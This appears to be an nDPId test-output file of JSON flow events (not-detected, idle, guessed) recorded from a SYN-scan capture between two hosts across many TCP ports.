-00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1300,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060456,"flow_last_seen":1278275060456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32769,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1300,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060456,"flow_last_seen":1278275060456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32769,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":802,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059737,"flow_last_seen":1278275059737,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49154,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":802,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059737,"flow_last_seen":1278275059737,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49154,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1906,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2049,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1906,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2049,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8194,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8194,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1011,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1011,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":605,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8193,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":605,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8193,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":853,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49154,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":853,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49154,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1834,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061206,"flow_last_seen":1278275061206,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32770,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1834,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061206,"flow_last_seen":1278275061206,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32770,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1887,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061256,"flow_last_seen":1278275061256,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10243,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1887,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061256,"flow_last_seen":1278275061256,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10243,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1480,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32771,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1480,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32771,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1263,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060392,"flow_last_seen":1278275060392,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8194,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1263,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060392,"flow_last_seen":1278275060392,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8194,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00591{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":544,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":544,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058281,"flow_last_seen":1278275058281,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49155,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058281,"flow_last_seen":1278275058281,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49155,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1569,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32771,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1569,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32771,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1965,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10243,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1965,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10243,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1332,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060492,"flow_last_seen":1278275060492,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32772,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1332,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060492,"flow_last_seen":1278275060492,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32772,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":793,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49156,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":793,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49156,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00591{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":841,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":841,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00591{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":603,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":603,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49155,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49155,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1951,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061314,"flow_last_seen":1278275061314,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49157,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1951,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061314,"flow_last_seen":1278275061314,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49157,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1413,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32772,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1413,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32772,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1177,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060287,"flow_last_seen":1278275060287,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32773,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1177,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060287,"flow_last_seen":1278275060287,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32773,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00591{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":906,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 